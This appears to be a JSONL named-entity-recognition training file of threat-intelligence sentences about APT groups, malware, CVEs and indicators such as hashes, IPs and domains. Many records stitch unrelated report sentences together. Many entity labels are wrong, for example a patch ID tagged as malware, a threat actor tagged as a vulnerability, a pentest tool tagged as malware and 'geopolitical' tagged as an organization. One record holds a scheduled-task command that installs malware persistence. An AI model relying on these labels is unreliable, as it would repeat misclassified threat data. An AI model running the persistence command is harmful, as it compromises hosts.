{"text": "further straining the relationship between Hamas and the Palestinian Authority who governs the West Bank .", "spans": {"ORGANIZATION: Hamas": [[43, 48]], "ORGANIZATION: Palestinian Authority": [[57, 78]]}, "info": {"id": "cyberner_stix_train_000035", "source": "cyberner_stix_train"}}
{"text": "The result of the password validation will always be wrong , but after the apparent validation attempt , the decoy PDF document is opened .", "spans": {"TOOL: PDF": [[115, 118]]}, "info": {"id": "cyberner_stix_train_000036", "source": "cyberner_stix_train"}}
{"text": "In the examined version , it was downloaded from : hxxp : //url [ . The malware starts communicating with the C&C server by sending basic information about the infected machine . Circumstantial evidence suggests there could be a link between this group and the United Arab Emirates ( UAE ) government , but that has not been confirmed .", "spans": {"MALWARE: malware": [[72, 79]], "ORGANIZATION: United Arab Emirates ( UAE ) government": [[261, 300]]}, "info": {"id": "cyberner_stix_train_000037", "source": "cyberner_stix_train"}}
{"text": "+86.01078456689 The command-and-control server is hosting an index page which also serves an APK file : The referenced “ Document.apk ” is 333583 bytes in size , MD5 : c4c4077e9449147d754afd972e247efc . PLEAD also uses CVE-2017-7269 , a buffer overflow vulnerability Microsoft Internet Information Services ( IIS ) 6.0 to compromise the victim 's server . A cursory review of BlackOasis ' espionage campaign suggests there is some overlap between the group 's actions and Saudi Arabia 's geopolitical interests .", "spans": {"VULNERABILITY: CVE-2017-7269": [[219, 232]], "THREAT_ACTOR: BlackOasis": [[376, 386]], "ORGANIZATION: geopolitical": [[488, 500]]}, "info": {"id": "cyberner_stix_train_000038", "source": "cyberner_stix_train"}}
{"text": "The group has focused mainly on governmental targets in Iraq and Saudi Arabia , according to past telemetry . This time the document purported to be about the involvement of the Emir of Qatar in funding ISIS , which was seemingly copied from a website critical of Qatar .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: governmental": [[32, 44]]}, "info": {"id": "cyberner_stix_train_000039", "source": "cyberner_stix_train"}}
{"text": "intelnetservice.com intelsupport.net The export called “ Applicate ” runs a standard Windows application message loop until a “ WM_ENDSESSION ” message is received .", "spans": {"DOMAIN: intelnetservice.com": [[0, 19]], "DOMAIN: intelsupport.net": [[20, 36]], "SYSTEM: Windows": [[85, 92]]}, "info": {"id": "cyberner_stix_train_000040", "source": "cyberner_stix_train"}}
{"text": "File Server ( http : //www.psservicedl [ . The group has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks . The Seedworm group controls its Powermud backdoor from behind a proxy network to hide the ultimate command-and-control ( C&C ) location .", "spans": {"THREAT_ACTOR: group": [[47, 52]], "TOOL: Daserf malware": [[135, 149]], "VULNERABILITY: Flash exploits": [[175, 189]], "THREAT_ACTOR: Seedworm group": [[212, 226]], "MALWARE: Powermud backdoor": [[240, 257]], "TOOL: command-and-control": [[307, 326]], "TOOL: C&C": [[329, 332]]}, "info": {"id": "cyberner_stix_train_000042", "source": "cyberner_stix_train"}}
{"text": "The exploit installs Silence’s loader , designed to download backdoors and other malicious programs . In the 2017 ShadowPad attack , the update mechanism for Korean server management software provider NetSarang was compromised to serve up an eponymous backdoor .", "spans": {"VULNERABILITY: exploit": [[4, 11]], "THREAT_ACTOR: Silence’s": [[21, 30]], "ORGANIZATION: server management software provider": [[165, 200]]}, "info": {"id": "cyberner_stix_train_000043", "source": "cyberner_stix_train"}}
{"text": "Of these , CosmicDuke and MiniDuke appear to have been in more active use , while receiving only minor updates .", "spans": {"MALWARE: CosmicDuke": [[11, 21]], "MALWARE: MiniDuke": [[26, 34]]}, "info": {"id": "cyberner_stix_train_000045", "source": "cyberner_stix_train"}}
{"text": "It ’s worth mentioning that , according to X-Force IRIS , the initial compromise took place weeks before the actual Shamoon deployment and activation were launched .", "spans": {"ORGANIZATION: X-Force IRIS": [[43, 55]], "MALWARE: Shamoon": [[116, 123]]}, "info": {"id": "cyberner_stix_train_000046", "source": "cyberner_stix_train"}}
{"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload . Around the same time , WildFire also captured an e-mail containing a Word document ( \" hello.docx \" ) with an identical hash as the earlier Word document , this time sent to a U.S. Government recipient .", "spans": {"MALWARE: documents": [[12, 21]], "VULNERABILITY: CVE-2017-0199": [[32, 45]], "ORGANIZATION: WildFire": [[94, 102]], "TOOL: e-mail": [[120, 126]], "TOOL: Word": [[140, 144], [211, 215]], "FILEPATH: hello.docx": [[158, 168]], "ORGANIZATION: Government": [[252, 262]]}, "info": {"id": "cyberner_stix_train_000047", "source": "cyberner_stix_train"}}
{"text": "First , the app has to turn off SELinux protection . This attack campaign focused on the chemical sector with the goal of obtaining sensitive documents such as proprietary designs , formulas , and manufacturing processes . In the past , threat actors would modify easily compromised websites to host C2 commands and configuration , as observed in the China based APT1 ’s WEBC2 suite of backdoors . This downloader is unique per system and contains a customized backdoor written in Assembler .", "spans": {"SYSTEM: SELinux": [[32, 39]], "ORGANIZATION: chemical sector": [[89, 104]], "TOOL: C2": [[300, 302]], "THREAT_ACTOR: APT1": [[363, 367]], "MALWARE: WEBC2": [[371, 376]]}, "info": {"id": "cyberner_stix_train_000048", "source": "cyberner_stix_train"}}
{"text": "The malicious documents seen in recent activity refer to a number of topics , including recent military promotions within the Pakistan Army , information related to the Pakistan Atomic Energy Commission , as well as Pakistan 's Ministry of the Interior . The EternalBlue exploits from the framework received worldwide attention after being used in the ransomware campaigns WannaCry in May and Petya / NotPetya in June 2017 .", "spans": {"MALWARE: malicious documents": [[4, 23]], "ORGANIZATION: Pakistan Army": [[126, 139]], "VULNERABILITY: EternalBlue": [[259, 270]], "VULNERABILITY: exploits": [[271, 279]], "MALWARE: Petya": [[393, 398]], "MALWARE: NotPetya": [[401, 409]]}, "info": {"id": "cyberner_stix_train_000049", "source": "cyberner_stix_train"}}
{"text": "This malware also contains a screen recorder . The Lamberts toolkit spans across several years , with most activity occurring in 2013 and 2014 . APT12 is believed to be a cyber espionage group thought to have links to the Chinese People's Liberation Army . For example , HTTPS over port 8088[1 ] or port 587[2 ] as opposed to the traditional port 443 .", "spans": {"TOOL: Lamberts toolkit": [[51, 67]], "THREAT_ACTOR: APT12": [[145, 150]], "ORGANIZATION: Chinese People's Liberation Army": [[222, 254]]}, "info": {"id": "cyberner_stix_train_000050", "source": "cyberner_stix_train"}}
{"text": "After infestation , Weeping Angel places the target TV in a 'Fake-Off' mode , so that the owner falsely believes the TV is off when it is on . We encountered the first document exploit called \" THAM luan - GD - NCKH2.doc \" a few days ago , which appears to be leveraging some vulnerabilities patched with MS12-060 .", "spans": {"THREAT_ACTOR: Weeping Angel": [[20, 33]], "VULNERABILITY: exploit": [[177, 184]], "FILEPATH: THAM luan - GD -": [[194, 210]], "FILEPATH: NCKH2.doc": [[211, 220]], "MALWARE: MS12-060": [[305, 313]]}, "info": {"id": "cyberner_stix_train_000051", "source": "cyberner_stix_train"}}
{"text": "This vulnerability was discovered by FireEye in September 2017 , and it is a vulnerability we have observed being exploited in the wild . Carbanak is a backdoor used by the attackers to compromise the victim .", "spans": {"VULNERABILITY: vulnerability": [[5, 18]], "ORGANIZATION: FireEye": [[37, 44]], "FILEPATH: Carbanak": [[138, 146]], "MALWARE: backdoor": [[152, 160]], "THREAT_ACTOR: attackers": [[173, 182]]}, "info": {"id": "cyberner_stix_train_000052", "source": "cyberner_stix_train"}}
{"text": "Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , EQNEDT32.exe , scores high for potentially malicious activity . Bahamut spearphishing attempts have also been accompanied with SMS messages purporting to be from Google about security issues on their account , including a class 0 message or \" Flash text \" . These text messages did not include links but are intended to build credibility around the fake service notifications later sent to the target 's email address .", "spans": {"VULNERABILITY: CVE-2017-1182": [[87, 100]], "MALWARE: Microsoft Equation Editor": [[118, 143]], "MALWARE: EQNEDT32.exe": [[146, 158]], "ORGANIZATION: Google": [[308, 314]], "TOOL: Flash": [[389, 394]], "TOOL: email": [[550, 555]]}, "info": {"id": "cyberner_stix_train_000053", "source": "cyberner_stix_train"}}
{"text": "Once we looked into the file , we quickly found out that the inner-workings of the APK included a malicious payload , embedded in the original code of the application . PyLocky was found to be targeting entities in France and Germany . We witnessed this actor extensively testing a known public exploit during its preparation for the next campaign . Fake browser updates are a very common decoy used by malware authors .", "spans": {"TOOL: PyLocky": [[169, 176]]}, "info": {"id": "cyberner_stix_train_000054", "source": "cyberner_stix_train"}}
{"text": "Conclusion This trojan shows a new path for threats to evolve . Aside from deploying novel malware , LYCEUM’s activity demonstrates capabilities CTU researchers have observed from other threat groups and reinforces the value of a few key controls . TEMP.Hermit is generally linked to operations focused on South Korea and the United States .", "spans": {"THREAT_ACTOR: LYCEUM’s": [[101, 109]], "ORGANIZATION: CTU": [[145, 148]], "THREAT_ACTOR: TEMP.Hermit": [[249, 260]]}, "info": {"id": "cyberner_stix_train_000055", "source": "cyberner_stix_train"}}
{"text": "Both versions are designed to collect system information and running processes and send them to the designated C2 server using http POST to the URI used in both cases is /agr-enum/progress-inform/cube.php?res= .", "spans": {"TOOL: C2": [[111, 113]]}, "info": {"id": "cyberner_stix_train_000056", "source": "cyberner_stix_train"}}
{"text": "We believe Sofacy used this tool , as the macro within their delivery document closely resembles the macros found within Luckystrike .", "spans": {"THREAT_ACTOR: Sofacy": [[11, 17]], "TOOL: macro": [[42, 47]], "TOOL: Luckystrike": [[121, 132]]}, "info": {"id": "cyberner_stix_train_000057", "source": "cyberner_stix_train"}}
{"text": "Both INDRIK SPIDER ( with BitPaymer ransomware ) and GRIM SPIDER ( with Ryuk ransomware ) have made headlines with their high profile victims and ransom profits , demonstrating that big game hunting is a lucrative enterprise . A powerful threat actor known as \" Wild Neutron \" ( also known as \" Jripbot \" and \" Morpho \" ) has been active since at least 2011 , infecting high profile companies for several years by using a combination of exploits , watering holes and multi-platform malware .", "spans": {"THREAT_ACTOR: INDRIK SPIDER": [[5, 18]], "TOOL: BitPaymer": [[26, 35]], "TOOL: ransomware": [[36, 46]], "THREAT_ACTOR: GRIM SPIDER": [[53, 64]], "TOOL: Ryuk ransomware": [[72, 87]], "THREAT_ACTOR: Jripbot": [[295, 302]], "THREAT_ACTOR: Morpho": [[311, 317]], "ORGANIZATION: high profile companies": [[370, 392]]}, "info": {"id": "cyberner_stix_train_000058", "source": "cyberner_stix_train"}}
{"text": "In this campaign , adversaries did not use any exploit .", "spans": {}, "info": {"id": "cyberner_stix_train_000059", "source": "cyberner_stix_train"}}
{"text": "The stream of bytes is sent over TCP to the client .", "spans": {}, "info": {"id": "cyberner_stix_train_000060", "source": "cyberner_stix_train"}}
{"text": "Figure 8 . Additionally , there is evidence to suggest APT33 targeted Saudi Arabian and Western organizations that provide training , maintenance and support for Saudi Arabia 's military and commercial fleets . The malicious DLL exports the same function names as the original mcvsocfg.dll library . HHS HC3 warned that the stolen credentials may have been used to compromise a number of healthcare organizations and enterprises in other industries .", "spans": {"THREAT_ACTOR: APT33": [[55, 60]], "ORGANIZATION: military": [[178, 186]], "ORGANIZATION: commercial": [[191, 201]], "TOOL: DLL": [[225, 228]], "FILEPATH: mcvsocfg.dll": [[277, 289]], "ORGANIZATION: HHS HC3": [[300, 307]], "ORGANIZATION: healthcare organizations": [[388, 412]], "ORGANIZATION: enterprises in other industries": [[417, 448]]}, "info": {"id": "cyberner_stix_train_000061", "source": "cyberner_stix_train"}}
{"text": "7bb719f1c64d627ecb1f13c97dc050a7bb1441497f26578f7b2a9302adbbb128 .", "spans": {"FILEPATH: 7bb719f1c64d627ecb1f13c97dc050a7bb1441497f26578f7b2a9302adbbb128": [[0, 64]]}, "info": {"id": "cyberner_stix_train_000062", "source": "cyberner_stix_train"}}
{"text": "Do not download mobile apps from unofficial or unauthorized sources . This next stage library copies itself into the System32 directory of the Windows folder after the hardcoded file name — either KBDLV2.DLL or AUTO.DLL , depending on the malware sample . Spring Dragon 's infiltration techniques there were not simply spearphish .", "spans": {"MALWARE: KBDLV2.DLL": [[197, 207]], "MALWARE: AUTO.DLL": [[211, 219]], "THREAT_ACTOR: Spring Dragon": [[256, 269]]}, "info": {"id": "cyberner_stix_train_000063", "source": "cyberner_stix_train"}}
{"text": "The implants are highly configurable via encrypted configuration files , which allow the adversary to customize various components , including C2 servers , the list of initial tasks to carry out , persistence mechanisms , encryption keys and others .", "spans": {"TOOL: C2": [[143, 145]]}, "info": {"id": "cyberner_stix_train_000064", "source": "cyberner_stix_train"}}
{"text": "] com/ ) : This server provides APK files with advertising network . A well-funded , highly active BlackOasis group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group . There was a mistake in the original Morphisec analysis which linked these attacks to FIN7 .", "spans": {"THREAT_ACTOR: BlackOasis group": [[99, 115]], "THREAT_ACTOR: hackers": [[134, 141]], "VULNERABILITY: zero-day exploit": [[185, 201]], "THREAT_ACTOR: Gamma Group": [[327, 338]], "ORGANIZATION: Morphisec": [[377, 386]], "THREAT_ACTOR: FIN7": [[426, 430]]}, "info": {"id": "cyberner_stix_train_000065", "source": "cyberner_stix_train"}}
{"text": "Researchers at Palo Alto have attributed sloo.exe and related activities to threat actors of a likely Iranian state-sponsored origin which they ’ve named Magic Hound .", "spans": {"FILEPATH: sloo.exe": [[41, 49]], "THREAT_ACTOR: Magic Hound": [[154, 165]]}, "info": {"id": "cyberner_stix_train_000066", "source": "cyberner_stix_train"}}
{"text": "In the most recent variant , Sofacy modified the internals of the malicious scripts , but continues to follow the same process used by previous variants by obtaining a malicious Flash object and payload directly from the C2 server .", "spans": {"THREAT_ACTOR: Sofacy": [[29, 35]], "TOOL: Flash": [[178, 183]], "TOOL: C2": [[221, 223]]}, "info": {"id": "cyberner_stix_train_000067", "source": "cyberner_stix_train"}}
{"text": "A lockdown activity , which is a transparent window shown at the top of the screen that contains a “ loading ” cursor . Alternatively , the attackers might have used social engineering to trick WikiLeaks 's DNS provider into handing over the credentials , or simple requested that a password reset link be sent to a compromised email address . The group 's targets include a number of organizations and individuals located in Russia .", "spans": {"ORGANIZATION: WikiLeaks": [[194, 203]], "ORGANIZATION: DNS provider": [[207, 219]]}, "info": {"id": "cyberner_stix_train_000068", "source": "cyberner_stix_train"}}
{"text": "In more up-to-date versions of Android , EventBot will ask for permissions to run in the background before deleting itself from the launcher . DoublePulsar is then used to inject a secondary payload , which runs in memory only . It is highly likely the Lotus Blossom used spear-phishing attacks containing links to these malicious documents as a delivery mechanism .", "spans": {"SYSTEM: Android": [[31, 38]], "MALWARE: EventBot": [[41, 49]], "MALWARE: DoublePulsar": [[143, 155]], "THREAT_ACTOR: Lotus Blossom": [[253, 266]]}, "info": {"id": "cyberner_stix_train_000069", "source": "cyberner_stix_train"}}
{"text": "This is a good example where two-factor authentication based on SMS would fail since the attacker can read the SMS . APT10 primarily used PlugX malware from 2014 to 2016 , progressively improving and deploying newer versions , while simultaneously standardising their command and control function . OceanLotus : cd67415dd634fd202fa1f05aa26233c74dc85332f70e11469e02b370f3943b1d Loader #2 . Additionally , by using leaked source code , threat actors can confuse or mislead investigators , as security professionals may be more likely to misattribute the activity to the wrong actor .", "spans": {"THREAT_ACTOR: APT10": [[117, 122]], "TOOL: PlugX malware": [[138, 151]], "THREAT_ACTOR: OceanLotus": [[299, 309]], "FILEPATH: cd67415dd634fd202fa1f05aa26233c74dc85332f70e11469e02b370f3943b1d": [[312, 376]], "ORGANIZATION: security professionals": [[490, 512]], "VULNERABILITY: misattribute the activity to the wrong actor": [[535, 579]]}, "info": {"id": "cyberner_stix_train_000070", "source": "cyberner_stix_train"}}
{"text": "The system verifies the signature of the legitimate file while installing the malicious file . There has also been at least one victim targeted by a spear-phishing attack . In the case we examined , the path was C:\\ProgramData\\DRM\\CLR\\CLR.exe . The campaign started in at least June 2023 , and the ransom note appears to mimic certain aspects of the ransom note used in the global WannaCry attacks from 2017 .", "spans": {"FILEPATH: C:\\ProgramData\\DRM\\CLR\\CLR.exe": [[212, 242]]}, "info": {"id": "cyberner_stix_train_000071", "source": "cyberner_stix_train"}}
{"text": "For the Delphi version , the following registry key and value are used for persistence :", "spans": {"TOOL: Delphi": [[8, 14]]}, "info": {"id": "cyberner_stix_train_000072", "source": "cyberner_stix_train"}}
{"text": "Both CloudDuke backdoor variants support simple backdoor functionality , similar to SeaDuke .", "spans": {"MALWARE: CloudDuke backdoor": [[5, 23]], "MALWARE: SeaDuke": [[84, 91]]}, "info": {"id": "cyberner_stix_train_000073", "source": "cyberner_stix_train"}}
{"text": "LINKS TO WOLF INTELLIGENCE During the Virus Bulletin conference in 2018 , CSIS researchers Benoît Ancel and Aleksejs Kuprins did a presentation on Wolf Research and the offensive arsenal developed by the organization . The police suspected Lurk of stealing nearly three billion rubles , using malicious software to systematically withdraw large sums of money from the accounts of commercial organizations , including banks . Older versions also used an XLS exploit . The source code is loaded from one of several domains impersonating Google ( google - analytiks[.]com ) or Adobe ( updateadobeflash[.]website ): That code contains all the web elements ( images , fonts , text ) needed to render the fake browser update page .", "spans": {"ORGANIZATION: CSIS": [[74, 78]], "ORGANIZATION: Wolf Research": [[147, 160]], "TOOL: Lurk": [[240, 244]], "ORGANIZATION: commercial organizations": [[380, 404]], "ORGANIZATION: banks": [[417, 422]], "TOOL: XLS": [[453, 456]], "TOOL: Google": [[535, 541]], "TOOL: Adobe": [[574, 579]]}, "info": {"id": "cyberner_stix_train_000074", "source": "cyberner_stix_train"}}
{"text": "As has been previously reported , some versions of the Android malware were present in the Google Play Store . We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . Little detail is given on the nature of how the connection between DNSMessenger and MuddyWater was discovered it isn't possible for us to verify this link .", "spans": {"SYSTEM: Android": [[55, 62]], "SYSTEM: Google Play Store": [[91, 108]], "VULNERABILITY: Carbanak": [[131, 139]], "THREAT_ACTOR: criminals": [[206, 215]], "ORGANIZATION: financial industry": [[256, 274]], "ORGANIZATION: customers": [[298, 307]], "MALWARE: DNSMessenger": [[377, 389]], "MALWARE: MuddyWater": [[394, 404]]}, "info": {"id": "cyberner_stix_train_000075", "source": "cyberner_stix_train"}}
{"text": "] com Malicious Twitter accounts : https : //twitter.com/lucky88755 https : //twitter.com/lucky98745 https : //twitter.com/lucky876543 https : //twitter.com/luckyone1232 https : //twitter.com/sadwqewqeqw https : //twitter.com/gyugyu87418490 https : //twitter.com/fdgoer343 https : //twitter.com/sdfghuio342 https : //twitter.com/asdqweqweqeqw https : //twitter.com/ukenivor3 The JHUHUGIT implant became a relatively popular first stage for the Sofacy attacks and was used again with a Java zero-day ( CVE-2015-2590 ) in July 2015 . The document contained a VBS macro that once decompressed was approximately 650 lines of code . Bullock had spent many hours poring over the hundreds of thousands of emails that the Ashley Madison hackers stole from Biderman and published online in 2015 .", "spans": {"ORGANIZATION: Twitter": [[16, 23]], "TOOL: JHUHUGIT": [[379, 387]], "VULNERABILITY: Java zero-day": [[485, 498]], "VULNERABILITY: CVE-2015-2590": [[501, 514]], "TOOL: VBS macro": [[557, 566]], "ORGANIZATION: Bullock": [[628, 635]], "THREAT_ACTOR: Ashley Madison hackers": [[714, 736]], "ORGANIZATION: Biderman": [[748, 756]]}, "info": {"id": "cyberner_stix_train_000076", "source": "cyberner_stix_train"}}
{"text": "The file is a 64bit-compatible compiled binary of the open source utility Winexe .", "spans": {"TOOL: Winexe": [[74, 80]]}, "info": {"id": "cyberner_stix_train_000077", "source": "cyberner_stix_train"}}
{"text": "We ’ll cover more recent 2018 change in their targeting and the malware itself at SAS 2018 .", "spans": {"ORGANIZATION: SAS": [[82, 85]]}, "info": {"id": "cyberner_stix_train_000078", "source": "cyberner_stix_train"}}
{"text": "In addition , by using VBA2Graph , we were able to visualize the VBA call graph in the macros of each document . Compared to Patchwork , whose Trojanized documents exploit at least five security flaws , Confucius' backdoors are delivered through Office files exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 .", "spans": {"MALWARE: VBA2Graph": [[23, 32]], "THREAT_ACTOR: Patchwork": [[125, 134]], "VULNERABILITY: exploit": [[164, 171]], "VULNERABILITY: CVE-2015-1641": [[304, 317]], "VULNERABILITY: CVE-2017-11882": [[322, 336]]}, "info": {"id": "cyberner_stix_train_000079", "source": "cyberner_stix_train"}}
{"text": "Its main task is to bypass the two-factor authentication of the client in the online banking system . Thus , it is clear they are trying to be as stealthy as possible by hiding in the network traffic of the targeted organizations . There are newer versions , up to version 3.39 as of October 2014 . An exhaustive analysis of domains registered to the various Vistomail pseudonyms used by Harrison shows he also ran Bash - a - Business[.]com , which Harrison dedicated to “ all those sorry ass corporate executives out there profiting from your hard work , organs , lives , ideas , intelligence , and wallets . ”", "spans": {}, "info": {"id": "cyberner_stix_train_000080", "source": "cyberner_stix_train"}}
{"text": "Static analysis tools like IDA may not be useful in analyzing custom code that is interpreted and executed through a VM and a new set of instructions . In addition , we observed a TTP shift post publication with regards to their malware delivery ; they started using compromised but legitimate domains to serve their malware . Supply-chain attacks are hard to detect from the consumer perspective . Several issues in Foxit PDF reader could lead to arbitrary code execution Foxit PDF Reader is one of the most popular PDF readers on the market , offering many similar features to Adobe Acrobat .", "spans": {"TOOL: legitimate domains": [[283, 301]], "TOOL: Foxit PDF reader": [[417, 433]], "TOOL: Foxit PDF Reader": [[473, 489]], "TOOL: Adobe Acrobat": [[579, 592]]}, "info": {"id": "cyberner_stix_train_000081", "source": "cyberner_stix_train"}}
{"text": "Their evolving and modified SPLM / CHOPSTICK / XAgent code is a long-standing part of Sofacy activity , however much of it is changing .", "spans": {"MALWARE: SPLM": [[28, 32]], "MALWARE: CHOPSTICK": [[35, 44]], "MALWARE: XAgent": [[47, 53]], "THREAT_ACTOR: Sofacy": [[86, 92]]}, "info": {"id": "cyberner_stix_train_000082", "source": "cyberner_stix_train"}}
{"text": "we assess with high confidence that these incidents were conducted by APT10 also known as Stone Panda , menuPass , CVNX in an effort to gain access to networks and steal valuable intellectual property or gain commercial advantage . The first attack started in early July with a ShimRatReporter payload .", "spans": {"THREAT_ACTOR: APT10": [[70, 75]], "THREAT_ACTOR: Stone Panda": [[90, 101]], "THREAT_ACTOR: menuPass": [[104, 112]], "THREAT_ACTOR: CVNX": [[115, 119]], "FILEPATH: ShimRatReporter": [[278, 293]]}, "info": {"id": "cyberner_stix_train_000083", "source": "cyberner_stix_train"}}
{"text": "This alone would attract a whole new audience–and a new stream of revenue–for Yingmob . Ransomware that has been publicly named \" WannaCry \" , \" WCry \" or \" WanaCrypt0r \" ( based on strings in the binary and encrypted files ) has spread to at least 74 countries as of Friday 12 May 2017 , reportedly targeting Russia initially , and spreading to telecommunications , shipping , car manufacturers , universities and health care industries , among others . APT33 : 64.251.19.214 [REDACTED].sytes.net . The Stuxnet Virus identified in 2010 that was used to destroy the Iranian centrifuges is but one relevant example of such a motivation .", "spans": {"ORGANIZATION: Yingmob": [[78, 85]], "TOOL: WannaCry": [[130, 138]], "TOOL: WCry": [[145, 149]], "TOOL: WanaCrypt0r": [[157, 168]], "ORGANIZATION: telecommunications": [[346, 364]], "ORGANIZATION: shipping": [[367, 375]], "ORGANIZATION: car manufacturers": [[378, 395]], "ORGANIZATION: universities": [[398, 410]], "ORGANIZATION: health care industries": [[415, 437]], "THREAT_ACTOR: APT33": [[455, 460]], "IP_ADDRESS: 64.251.19.214": [[463, 476]], "DOMAIN: [REDACTED].sytes.net": [[477, 497]], "MALWARE: The Stuxnet Virus": [[500, 517]], "ORGANIZATION: Iranian centrifuges": [[566, 585]]}, "info": {"id": "cyberner_stix_train_000084", "source": "cyberner_stix_train"}}
{"text": "The DLL exploited another previously unknown vulnerability ( designated CVE-2015-2546 ) in the Windows kernel , which enabled it to elevate privileges for the Word executable and subsequently install a backdoor through the application . Hackers use Metasploit to conduct all these activities : network reconnaissance , search for vulnerable applications , exploit vulnerabilities , escalate systems privileges , and collect information .", "spans": {"TOOL: DLL": [[4, 7]], "VULNERABILITY: CVE-2015-2546": [[72, 85]], "TOOL: Word": [[159, 163]], "MALWARE: Metasploit": [[249, 259]], "VULNERABILITY: exploit": [[356, 363]]}, "info": {"id": "cyberner_stix_train_000085", "source": "cyberner_stix_train"}}
{"text": "Use of email theme related to the Geo-political events that is of interest to the targets .", "spans": {"TOOL: email": [[7, 12]]}, "info": {"id": "cyberner_stix_train_000086", "source": "cyberner_stix_train"}}
{"text": "Below are some of the elements showing the relation . In order to exfiltrate the compromised data , APT10 employed custom malware that used Dropbox as its C2 . The domain , softfix.co.kr was registered in 2014 .", "spans": {"THREAT_ACTOR: APT10": [[100, 105]], "TOOL: Dropbox": [[140, 147]], "DOMAIN: softfix.co.kr": [[173, 186]]}, "info": {"id": "cyberner_stix_train_000087", "source": "cyberner_stix_train"}}
{"text": "Since 2013 , the cybercrime gang have attempted to attack banks , e-payment systems and financial institutions using pieces of malware they designed , known as Carbanak and Cobalt . This documentation provides new insight into intrusion efforts conducted by at least four discrete Iranian threat actors , Rocket Kitten , Infy , Sima , and Operation Cleaver , including groups and tools that have not been previously disclosed .", "spans": {"THREAT_ACTOR: cybercrime gang": [[17, 32]], "ORGANIZATION: banks": [[58, 63]], "ORGANIZATION: e-payment": [[66, 75]], "ORGANIZATION: financial institutions": [[88, 110]], "VULNERABILITY: Carbanak": [[160, 168]], "TOOL: Cobalt": [[173, 179]], "THREAT_ACTOR: Rocket Kitten": [[305, 318]], "THREAT_ACTOR: Infy": [[321, 325]], "THREAT_ACTOR: Sima": [[328, 332]]}, "info": {"id": "cyberner_stix_train_000088", "source": "cyberner_stix_train"}}
{"text": "SCHTASKS /Create /f /SC minute /TN runawy /mo 5 /tr C:\\Users\\<USER>\\runawy.exe .", "spans": {"FILEPATH: C:\\Users\\<USER>\\runawy.exe": [[52, 78]]}, "info": {"id": "cyberner_stix_train_000089", "source": "cyberner_stix_train"}}
{"text": "The app ties together two malware families - Desert Scorpion and another targeted surveillanceware family named FrozenCell - that we believe are being developed by a single , evolving surveillanceware actor called APT-C-23 targeting individuals in the Middle East . DHS has previously released Alert TA14-353A . Older versions of 7Zip also behave like PowerArchiver and WinRAR . 7Zip version 9.22 and older saw the executable as . Simultaneously , a threat researcher outside of CrowdStrike discovered an attacker ’s tooling via an open repository , downloaded all of the tools , and made them available through a MegaUpload link in a Twitter post.2", "spans": {"MALWARE: Desert Scorpion": [[45, 60]], "MALWARE: FrozenCell": [[112, 122]], "MALWARE: APT-C-23": [[214, 222]], "ORGANIZATION: DHS": [[266, 269]], "TOOL: 7Zip": [[330, 334], [379, 383]], "TOOL: PowerArchiver": [[352, 365]], "TOOL: WinRAR": [[370, 376]], "ORGANIZATION: threat researcher": [[450, 467]], "ORGANIZATION: CrowdStrike": [[479, 490]], "TOOL: MegaUpload": [[614, 624]], "TOOL: Twitter": [[635, 642]]}, "info": {"id": "cyberner_stix_train_000090", "source": "cyberner_stix_train"}}
{"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities .", "spans": {"ORGANIZATION: government officials": [[28, 48]], "MALWARE: malicious Microsoft Word document": [[90, 123]], "VULNERABILITY: CVE-2012-0158": [[143, 156]], "ORGANIZATION: Unit 42": [[230, 237]], "FILEPATH: EPS files": [[310, 319]], "VULNERABILITY: CVE-2015-2545": [[334, 347]], "VULNERABILITY: CVE-2017-0261": [[352, 365]]}, "info": {"id": "cyberner_stix_train_000091", "source": "cyberner_stix_train"}}
{"text": "83be35956e5d409306a81e88a1dc89fd . 45.63.10.99 . 69.87.223.26 .", "spans": {"FILEPATH: 83be35956e5d409306a81e88a1dc89fd": [[0, 32]], "IP_ADDRESS: 45.63.10.99": [[35, 46]], "IP_ADDRESS: 69.87.223.26": [[49, 61]]}, "info": {"id": "cyberner_stix_train_000092", "source": "cyberner_stix_train"}}
{"text": "Bdo is the Russian translation for RBS ( Remote Banking System ) so it is clear that RBS is a target for this malware . In this latest incident , the group registered a fake news domain , timesofindiaa.in , on May 18 , 2016 , and then used it to send spear phishing emails to Indian government officials on the same day .", "spans": {"TOOL: emails": [[266, 272]], "ORGANIZATION: government officials": [[283, 303]]}, "info": {"id": "cyberner_stix_train_000093", "source": "cyberner_stix_train"}}
{"text": "Many other banking malware families followed suit and released their own Android malware components designed to steal those OTPs and TANs . APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel files to deliver their initial exploits . The use of infrastructure tied to Iranian operations , timing and alignment with the national interests of Iran also lead FireEye to assess that APT34 acts on behalf of the Iranian government .", "spans": {"THREAT_ACTOR: APT19": [[140, 145]], "MALWARE: Microsoft Excel files": [[197, 218]], "ORGANIZATION: FireEye": [[377, 384]], "THREAT_ACTOR: APT34": [[400, 405]]}, "info": {"id": "cyberner_stix_train_000094", "source": "cyberner_stix_train"}}
{"text": "The remaining 80% of STRONTIUM attacks have largely targeted organizations in the following sectors : government , IT , military , defense , medicine , education , and engineering .", "spans": {"THREAT_ACTOR: STRONTIUM": [[21, 30]]}, "info": {"id": "cyberner_stix_train_000095", "source": "cyberner_stix_train"}}
{"text": "While one family relies on a small number of supported commands and simple shells , the other delves into more convoluted methods of injections , checks , and supported feature sets . NetTraveler has been used to target diplomats , embassies and government institutions for over a decade , and remains the tool of choice by the adversaries behind these cyber espionage campaigns .", "spans": {"MALWARE: NetTraveler": [[184, 195]], "ORGANIZATION: diplomats": [[220, 229]], "ORGANIZATION: embassies": [[232, 241]], "ORGANIZATION: government institutions": [[246, 269]]}, "info": {"id": "cyberner_stix_train_000096", "source": "cyberner_stix_train"}}
